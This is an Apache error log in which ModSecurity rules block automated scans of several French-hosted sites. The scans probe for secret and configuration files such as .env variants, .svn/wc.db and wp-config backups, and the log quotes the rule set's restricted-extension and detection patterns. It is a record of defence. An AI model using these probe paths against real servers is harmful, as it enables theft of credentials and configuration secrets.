[Mon May 11 11:28:12.289196 2026] [security2:error] [pid 1254242:tid 1254268] [client 185.177.72.9:10434] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/public/.env.live5"] [unique_id "agGhLL4KNmD_mZ_vlf8xWwAAAFc"]
[Mon May 11 11:28:13.517247 2026] [security2:error] [pid 1254242:tid 1254268] [client 185.177.72.9:10434] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhLL4KNmD_mZ_vlf8xWwAAAFc"]
[Mon May 11 11:28:17.923006 2026] [ssl:error] [pid 1254133:tid 1254155] (EAI 2)Name or service not known: [client 195.178.110.64:10730] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:28:17.923303 2026] [ssl:error] [pid 1254133:tid 1254155] AH01941: stapling_renew_response: responder error
[Mon May 11 11:28:19.626552 2026] [security2:error] [pid 1254212:tid 1254220] [client 185.177.72.9:57430] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /puppeteer/.env.config.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/puppeteer/.env.config.stage"] [unique_id "agGhM0YQeUtAPynIs6xRCgAAAAY"]
[Mon May 11 11:28:19.626977 2026] [security2:error] [pid 1254212:tid 1254220] [client 185.177.72.9:57430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/puppeteer/.env.config.stage"] [unique_id "agGhM0YQeUtAPynIs6xRCgAAAAY"]
[Mon May 11 11:28:20.809202 2026] [security2:error] [pid 1254212:tid 1254220] [client 185.177.72.9:57430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhM0YQeUtAPynIs6xRCgAAAAY"]
[Mon May 11 11:28:20.835179 2026] [security2:error] [pid 1254212:tid 1254236] [client 185.177.72.9:57446] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /puppeteer/.env.config.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/puppeteer/.env.config.stage"] [unique_id "agGhNEYQeUtAPynIs6xRCwAAABY"]
[Mon May 11 11:28:20.835395 2026] [security2:error] [pid 1254212:tid 1254236] [client 185.177.72.9:57446] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/puppeteer/.env.config.stage"] [unique_id "agGhNEYQeUtAPynIs6xRCwAAABY"]
[Mon May 11 11:28:22.087481 2026] [security2:error] [pid 1254212:tid 1254236] [client 185.177.72.9:57446] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhNEYQeUtAPynIs6xRCwAAABY"]
[Mon May 11 11:28:31.802610 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:11000] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /python/.env.save_local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/python/.env.save_local"] [unique_id "agGhP0Rdw2n9wv6Ai48AIwAAAJU"]
[Mon May 11 11:28:31.802964 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:11000] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/python/.env.save_local"] [unique_id "agGhP0Rdw2n9wv6Ai48AIwAAAJU"]
[Mon May 11 11:28:32.976173 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:11000] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhP0Rdw2n9wv6Ai48AIwAAAJU"]
[Mon May 11 11:28:33.001654 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.177.72.9:11016] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /python/.env.save_local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/python/.env.save_local"] [unique_id "agGhQUYQeUtAPynIs6xRHQAAABU"]
[Mon May 11 11:28:33.002353 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.177.72.9:11016] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/python/.env.save_local"] [unique_id "agGhQUYQeUtAPynIs6xRHQAAABU"]
[Mon May 11 11:28:33.889414 2026] [security2:error] [pid 1256241:tid 1256261] [client 65.111.26.54:33043] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env"] [unique_id "agGhQZkIEwRJMyDaV55GegAAAU8"]
[Mon May 11 11:28:33.889866 2026] [security2:error] [pid 1256241:tid 1256261] [client 65.111.26.54:33043] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env"] [unique_id "agGhQZkIEwRJMyDaV55GegAAAU8"]
[Mon May 11 11:28:33.890851 2026] [security2:error] [pid 1256241:tid 1256261] [client 65.111.26.54:33043] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env"] [unique_id "agGhQZkIEwRJMyDaV55GegAAAU8"]
[Mon May 11 11:28:34.200439 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.177.72.9:11016] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhQUYQeUtAPynIs6xRHQAAABU"]
[Mon May 11 11:28:34.316033 2026] [security2:error] [pid 1254328:tid 1254339] [client 209.50.166.2:56361] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "nearoo.fr"] [uri "/.svn/wc.db"] [unique_id "agGhQkRdw2n9wv6Ai48AKgAAAIg"]
[Mon May 11 11:28:34.316217 2026] [security2:error] [pid 1254328:tid 1254339] [client 209.50.166.2:56361] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/wc.db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.svn/wc.db"] [unique_id "agGhQkRdw2n9wv6Ai48AKgAAAIg"]
[Mon May 11 11:28:34.316417 2026] [security2:error] [pid 1254328:tid 1254339] [client 209.50.166.2:56361] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.svn/wc.db"] [unique_id "agGhQkRdw2n9wv6Ai48AKgAAAIg"]
[Mon May 11 11:28:34.316633 2026] [security2:error] [pid 1254328:tid 1254339] [client 209.50.166.2:56361] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.svn/wc.db"] [unique_id "agGhQkRdw2n9wv6Ai48AKgAAAIg"]
[Mon May 11 11:28:41.665084 2026] [security2:error] [pid 1254328:tid 1254333] [client 185.177.72.9:63082] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rails/.env.debug3"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/rails/.env.debug3"] [unique_id "agGhSURdw2n9wv6Ai48ANQAAAII"]
[Mon May 11 11:28:41.665813 2026] [security2:error] [pid 1254328:tid 1254333] [client 185.177.72.9:63082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/rails/.env.debug3"] [unique_id "agGhSURdw2n9wv6Ai48ANQAAAII"]
[Mon May 11 11:28:42.836568 2026] [security2:error] [pid 1254328:tid 1254333] [client 185.177.72.9:63082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhSURdw2n9wv6Ai48ANQAAAII"]
[Mon May 11 11:28:42.863847 2026] [security2:error] [pid 1254242:tid 1254248] [client 185.177.72.9:63090] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rails/.env.debug3"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/rails/.env.debug3"] [unique_id "agGhSr4KNmD_mZ_vlf8xgwAAAEI"]
[Mon May 11 11:28:42.864976 2026] [security2:error] [pid 1254242:tid 1254248] [client 185.177.72.9:63090] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/rails/.env.debug3"] [unique_id "agGhSr4KNmD_mZ_vlf8xgwAAAEI"]
[Mon May 11 11:28:44.118071 2026] [security2:error] [pid 1254242:tid 1254248] [client 185.177.72.9:63090] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhSr4KNmD_mZ_vlf8xgwAAAEI"]
[Mon May 11 11:28:44.148144 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:45994] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /rails/.htaccess.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/rails/.htaccess.backup"] [unique_id "agGhTBjZymfuKpjWXeh0kAAAAMc"]
[Mon May 11 11:28:44.148376 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:45994] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/rails/.htaccess.backup"] [unique_id "agGhTBjZymfuKpjWXeh0kAAAAMc"]
[Mon May 11 11:28:45.346947 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:45994] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhTBjZymfuKpjWXeh0kAAAAMc"]
[Mon May 11 11:28:45.373405 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:46000] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /rails/.htaccess.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/rails/.htaccess.backup"] [unique_id "agGhTb4KNmD_mZ_vlf8xhAAAAFA"]
[Mon May 11 11:28:45.374544 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:46000] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/rails/.htaccess.backup"] [unique_id "agGhTb4KNmD_mZ_vlf8xhAAAAFA"]
[Mon May 11 11:28:46.605645 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:46000] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhTb4KNmD_mZ_vlf8xhAAAAFA"]
[Mon May 11 11:28:51.481572 2026] [:error] [pid 1254179:tid 1254187] [client 74.7.242.145:41112] File does not exist: /home/ofcrysta/public_html/index.php, referer: https://of-crystal-lake.net/page.php?idpage=168
[Mon May 11 11:28:54.974510 2026] [ssl:error] [pid 1254212:tid 1254214] [client 18.235.110.182:24434] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname webmail.maelbailly.fr provided via HTTP have no compatible SSL setup for policy 'secure'
[Mon May 11 11:28:55.060576 2026] [security2:error] [pid 1254328:tid 1254332] [client 185.177.72.9:5420] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.old found within REQUEST_FILENAME: /rails/wp-config.old.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/rails/wp-config.old.backup"] [unique_id "agGhV0Rdw2n9wv6Ai48AVAAAAIE"]
[Mon May 11 11:28:55.061139 2026] [security2:error] [pid 1254328:tid 1254332] [client 185.177.72.9:5420] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/rails/wp-config.old.backup"] [unique_id "agGhV0Rdw2n9wv6Ai48AVAAAAIE"]
[Mon May 11 11:28:57.267814 2026] [security2:error] [pid 1254328:tid 1254332] [client 185.177.72.9:5420] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGhV0Rdw2n9wv6Ai48AVAAAAIE"]
[Mon May 11 11:28:57.293332 2026] [security2:error] [pid 1254133:tid 1254138] [client 185.177.72.9:5424] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.old found within REQUEST_FILENAME: /rails/wp-config.old.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/rails/wp-config.old.backup"] [unique_id "agGhWRjZymfuKpjWXeh0qwAAAMI"]
